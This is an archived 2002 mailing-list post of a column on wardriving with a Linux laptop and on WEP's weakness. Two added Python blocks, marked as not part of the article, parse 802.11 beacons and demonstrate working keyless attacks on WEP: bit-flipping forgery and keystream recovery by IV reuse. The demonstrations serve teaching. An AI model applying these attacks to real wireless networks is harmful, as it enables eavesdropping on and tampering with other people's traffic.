[ISN] A walk on the wireless side

From: InfoSec News (isnat_private)
Date: Wed Feb 20 2002 - 00:15:53 PST


    http://www.linuxworld.com/site-stories/2002/0218.wardriving.html
    
    By Joe Barr
    February 19, 2002
    
    (LinuxWorld) -- The idea was innocent enough: Enable my girlfriend to
    use a laptop computer to surf wirelessly from the sofa while watching
    TV. That, however, is not quite how things worked out. As I put the
    finishing touches on this story I am:
    
    * Packing my gear.
    * Making sure my laptop is fully charged.
    * Checking to see if I have the latest versions of all the 
      prerequisite "tools."
    
    Okay. All set. The laptop and I are wardriving again.
    
    A month or two back I wrote a column about an Austin, Texas firm named
    RockSteady. As part of the research for that story, I installed a
    "Rock Box," a dedicated firewall/network appliance. Included in it was
    a wireless NIC. All I had to do to be able to check e-mail or do
    research from the living room or the deck was to get a wireless PC
    card for my laptop. Temptation proved too great. I recently sprang for
    a D-Link DWL-650 802.11 wireless LAN card.
    
    Beginning with a fresh installation of Red Hat 7.2 on my Sony Vaio
    (PCG-XG700K), I added the latest releases of pcmcia-cs and wlan-ng to
    get the most out of my Prism2 based D-Link card. Your own card might
    require different tools, depending on what chipset it uses. At the
    time, the latest releases were pcmcia-cs-3.1.31 and
    linux-wlan-ng-0.1.12. You can find them at the sites noted in
    Resources. I won't walk you through compiling and installing them, but
    I will mention that many wireless tools require you to have the kernel
    source code available for them to compile.
    
    I found myself guessing at some of the options in the
    /etc/wlan-ng.opts configuration file simply because I wasn't familiar
    with wireless terminology. Ad hoc or infrastructure? Naturally, I chose
    the wrong one for the RockBox setup the first time. When I changed the
    option setting to ad hoc, it worked just fine. For the benefit of any
    other late arrivals to the wireless party, I've included a brief
    primer explaining some of the terms I ran across which were new to me. I
    also recommend spending some time on IRC visiting with the folks on
    the #wireless channel on openprojects.net.
    
    With a little more fiddling, I had the configuration set for ad hoc
    mode and an SSID of RockNet. That's all it took. Since then, I've
    learned that an SSID of "Any" works as well. There I was, surfing from
    my armchair in the living room, feeling like this was the way Internet
    access should always have been. Now, at last, if I feel like it, I can
    respond to those annoying realtime polls all the networks are doing in
    prime time TV. Susan can get on the 'net to exchange e-mail, shop, or
    visit dating sites to find a less nerdy boyfriend. Ah, the high life
    -- wireless Web surfing without leaving the flickering glow of the
    monocular monster, our TV.
    
    Trouble in paradise
    
    Alas, the wireless lifestyle is not all joy and light. Yes, wireless
    802.11 cards and access points are flying off the shelves. People want
    and find easy connectivity with 802.11-standard products. Ah, there's
    the rub, and a real dilemma it presents. Once again, we are caught
    between ease of use and security. It's almost enough to make me feel
    sympathy for Microsoft's chronic security problems, which are often
    excused as being the result of those same two choices. There are two
    major problems with wireless today. One is that all too often it is
    implemented without any kind of security at all. The other is that the
    out-of-the-box security options, if the consumer switches them on, are
    completely ineffectual.
    
    Wireless is so wide open, in fact, that it has given birth to a new
    geek Olympic sport: wardriving. Wardriving is to wireless what
    wardialing used to be to modems. The game is all about seeing how many
    potential targets you can find. Wardriving is a lot easier than
    wardialing, and a lot less intrusive. All you need to play is a
    laptop, a wireless PC card, and some software. In my case, the
    software I needed is called Prismstumbler, designed to play nicely
    with the chipset my D-Link card is based on.
    
    IANAL, (I Am Not A Lawyer) but my understanding is that wardriving is
    completely legal. (Ed. Even if he were a lawyer, the laws in your
    jurisdiction might vary.) Prismstumbler, for example, is less
    intrusive than Windows XP. According to what I've read on the 'net, a
    wireless XP box tries to associate with every wireless beacon it
    hears. Prismstumbler simply listens and tells you what it has heard.  
    It is completely passive. Unless Microsoft is operating under a
    completely separate legal system than the rest of us, scanning for
    wireless beacons can't be illegal. On second thought, perhaps I should
    come up with a different analogy.
    
    Wardriving can get sophisticated. You can connect an external antenna
    to your wireless card and put it on the roof of your car. You can
    attach a GPS device to the laptop, and an external antenna to that.  
    Then you can concentrate on driving and map the results later. I kept
    it simple, no GPS, and no antenna. Nevertheless, I still had a lot of
    fun and was surprised at how easy the game really is.
    
    My first excursion was to a small town of about 50,000 souls. I
    started up my Prismstumbler script and watched its findings appear by
    pointing my browser at http://localhost:9000. Suddenly, there it was.  
    My first "catch"! It was a used car dealership with not one, but two
    access points. Then another access point appeared, and then another. I
    drove only a couple of miles into the center of town and found more
    than a dozen. Most appeared to be unprotected. Only one was using the
    built-in encryption.
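    What a passive stumbler actually does is sit in monitor mode and decode
    the beacon frames every access point broadcasts several times a
    second; the BSSID, SSID, channel and the "Privacy" (WEP) bit in the
    capability field are all in the clear, which is how a survey like the
    one above can tell open networks from encrypted ones without ever
    transmitting. The following is an added example, not code from the
    article or from Prismstumbler: a minimal beacon parser and survey
    routine run over frames constructed inline (the MAC addresses, SSIDs
    and channels are made up to resemble the first drive described above,
    not a real capture).

```python
import struct
from dataclasses import dataclass
from typing import Dict, List, Optional

# 802.11 management frame, subtype 8 = Beacon (frame control byte 0 == 0x80)
FC_BEACON = 0x80
CAP_ESS = 0x0001      # infrastructure (access point)
CAP_IBSS = 0x0002     # ad hoc network
CAP_PRIVACY = 0x0010  # "Privacy" bit: WEP required to associate
IE_SSID = 0
IE_DS_PARAMS = 3      # carries the channel number


@dataclass
class Beacon:
    bssid: str
    ssid: str
    channel: Optional[int]
    privacy: bool   # WEP advertised
    ibss: bool      # True = ad hoc, False = infrastructure


def parse_beacon(frame: bytes) -> Optional[Beacon]:
    """Parse one raw 802.11 frame; return None unless it is a beacon."""
    # 24-byte MAC header + 12 bytes of fixed beacon fields is the minimum
    if len(frame) < 36 or frame[0] != FC_BEACON:
        return None
    bssid = ":".join(f"{b:02x}" for b in frame[16:22])  # addr3 = BSSID
    body = frame[24:]
    _timestamp, _interval, cap = struct.unpack_from("<QHH", body, 0)
    ssid, channel = "", None
    off = 12
    # Tagged parameters: (element id, length, value) until the frame ends.
    while off + 2 <= len(body):
        eid, length = body[off], body[off + 1]
        value = body[off + 2: off + 2 + length]
        if len(value) < length:   # truncated element: stop, keep what we have
            break
        if eid == IE_SSID:
            # Zero length (or all NULs) is a "cloaked" SSID; the AP is still visible.
            ssid = value.decode("utf-8", "replace").strip("\x00") or "<hidden>"
        elif eid == IE_DS_PARAMS and length == 1:
            channel = value[0]
        off += 2 + length
    return Beacon(bssid, ssid, channel, bool(cap & CAP_PRIVACY), bool(cap & CAP_IBSS))


def stumble(frames: List[bytes]) -> Dict[str, Beacon]:
    """Passive survey: one entry per BSSID, like a stumbler's listing."""
    seen: Dict[str, Beacon] = {}
    for f in frames:
        b = parse_beacon(f)
        if b is not None:
            seen.setdefault(b.bssid, b)
    return seen


def summarize(seen: Dict[str, Beacon]) -> Dict[str, int]:
    return {
        "total": len(seen),
        "wep": sum(1 for b in seen.values() if b.privacy),
        "open": sum(1 for b in seen.values() if not b.privacy),
    }


def build_beacon(bssid: bytes, ssid: bytes, channel: int, privacy: bool, ibss: bool = False) -> bytes:
    """Constructed test frame (not a real capture), for running the parser offline."""
    cap = (CAP_IBSS if ibss else CAP_ESS) | (CAP_PRIVACY if privacy else 0)
    header = bytes([FC_BEACON, 0]) + b"\x00\x00" + b"\xff" * 6 + bssid + bssid + b"\x00\x00"
    fixed = struct.pack("<QHH", 0, 100, cap)
    ies = bytes([IE_SSID, len(ssid)]) + ssid + bytes([IE_DS_PARAMS, 1, channel])
    return header + fixed + ies


SAMPLE_FRAMES = [  # constructed, modelled on the drive described in the article
    build_beacon(b"\x00\x40\x96\x00\x00\x01", b"CARLOT-1", 6, privacy=False),
    build_beacon(b"\x00\x40\x96\x00\x00\x02", b"CARLOT-2", 11, privacy=False),
    build_beacon(b"\x00\x40\x96\x00\x00\x01", b"CARLOT-1", 6, privacy=False),  # repeat beacon
    build_beacon(b"\x00\x02\x2d\x00\x00\x03", b"", 1, privacy=True),            # cloaked + WEP
    build_beacon(b"\x00\x90\x4b\x00\x00\x04", b"RockNet", 3, privacy=False, ibss=True),
    bytes([0x40, 0]) + b"\x00" * 34,  # probe request, not a beacon: ignored
]

if __name__ == "__main__":
    for b in stumble(SAMPLE_FRAMES).values():
        print(b)
    print(summarize(stumble(SAMPLE_FRAMES)))
```

    Note that a cloaked SSID only hides the name; the beacon, the BSSID
    and the Privacy bit are still broadcast, so hiding the SSID does not
    take a network off a wardriver's list.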
    
    The encryption built into wireless LANs, WEP, is useless, however. It
    has been cracked and the method to do so made public. One program
    (Airsnort) claims to be able to crack WEP in about a second, given
    enough captured packets to examine. The first line of defense for
    wireless -- the built-in encryption -- is just about as useful as
    ROT13.
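    Key recovery of the kind Airsnort performs (the Fluhrer, Mantin and
    Shamir weak-IV attack) is only one of WEP's published flaws. Two
    others need no key at all and follow directly from the design: the
    24-bit IV is sent in the clear and repeats, so two frames under the
    same IV share an RC4 keystream, and the integrity check is a plain
    CRC-32, which is linear, so an attacker can flip chosen bits of an
    encrypted frame and patch the check value to match. The following is
    an added example, not code from the article or from Airsnort: a
    bare-bones WEP encrypt/decrypt pair and both attacks carried out
    against it. The 40-bit key, IV and packet contents are constructed
    demo values, not from any real capture.

```python
import struct
import zlib
from typing import Optional


def rc4(key: bytes, length: int) -> bytes:
    """Plain RC4 keystream (KSA + PRGA), as used by WEP."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    """WEP integrity check value: plain CRC-32, little-endian."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """IV (3 bytes, sent in the clear) || RC4(IV||key) XOR (plaintext || ICV)."""
    assert len(iv) == 3
    keystream = rc4(iv + key, len(plaintext) + 4)
    return iv + xor(plaintext + icv(plaintext), keystream)


def wep_decrypt(key: bytes, frame: bytes) -> Optional[bytes]:
    """Return the plaintext, or None if the ICV check fails (frame would be dropped)."""
    iv, body = frame[:3], frame[3:]
    data = xor(body, rc4(iv + key, len(body)))
    plaintext, tag = data[:-4], data[-4:]
    return plaintext if icv(plaintext) == tag else None


def flip_bits(frame: bytes, delta: bytes) -> bytes:
    """Attacker, no key: XOR delta into the ciphertext and fix up the ICV.

    CRC-32 is affine over GF(2): crc(p ^ d) == crc(p) ^ crc(d) ^ crc(zeros),
    so the correction to the encrypted ICV depends only on delta.
    """
    iv, body = frame[:3], frame[3:]
    n = len(body) - 4
    assert len(delta) == n
    fix = (zlib.crc32(delta) ^ zlib.crc32(bytes(n))) & 0xFFFFFFFF
    return iv + xor(body, delta + struct.pack("<I", fix))


def recover_by_iv_reuse(frame_a: bytes, known_a: bytes, frame_b: bytes) -> bytes:
    """Attacker, no key: two frames under one IV share a keystream.

    Knowing the first len(known_a) plaintext bytes of frame A yields that much
    keystream, which decrypts the same prefix of frame B.
    """
    assert frame_a[:3] == frame_b[:3], "different IVs: no keystream reuse"
    keystream = xor(frame_a[3:3 + len(known_a)], known_a)
    return xor(frame_b[3:3 + len(keystream)], keystream)


# Constructed demo values: a 40-bit key and a 24-bit IV, not from any real capture.
KEY = bytes.fromhex("0102030405")
IV = b"\x00\x00\x01"


def demo_bit_flip() -> Optional[bytes]:
    frame = wep_encrypt(KEY, IV, b"GET /index.html")
    delta = bytes(5) + xor(b"index", b"admin") + bytes(5)  # rewrite bytes 5..9
    return wep_decrypt(KEY, flip_bits(frame, delta))       # the receiver accepts it


def demo_iv_reuse() -> bytes:
    a = wep_encrypt(KEY, IV, b"GET /index.html")   # a predictable request
    b = wep_encrypt(KEY, IV, b"secret=letmein!")   # a second frame, same IV
    return recover_by_iv_reuse(a, b"GET /index.html", b)


if __name__ == "__main__":
    print(demo_bit_flip())
    print(demo_iv_reuse())
```

    Both attacks work with a 104-bit key exactly as with a 40-bit one:
    the key length never enters into them, which is why longer WEP keys
    were never a fix.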
    
    Making matters worse is the ease of installing access points. I wonder
    how many IS shops have them in place and aren't even aware of it. I
    wonder how many are in place behind conventional lines of defense.
    
    I have fun with my wardriving, and I've even alerted a few folks to
    the problems they invite with unprotected wireless. But trust me. Not
    everyone out there wardriving is satisfied at stopping with a little
    innocent fun.
    
    
    
    -
    ISN is currently hosted by Attrition.org
    
    To unsubscribe email majordomoat_private with 'unsubscribe isn' in the BODY
    of the mail.
    



    This archive was generated by hypermail 2b30 : Wed Feb 20 2002 - 03:34:27 PST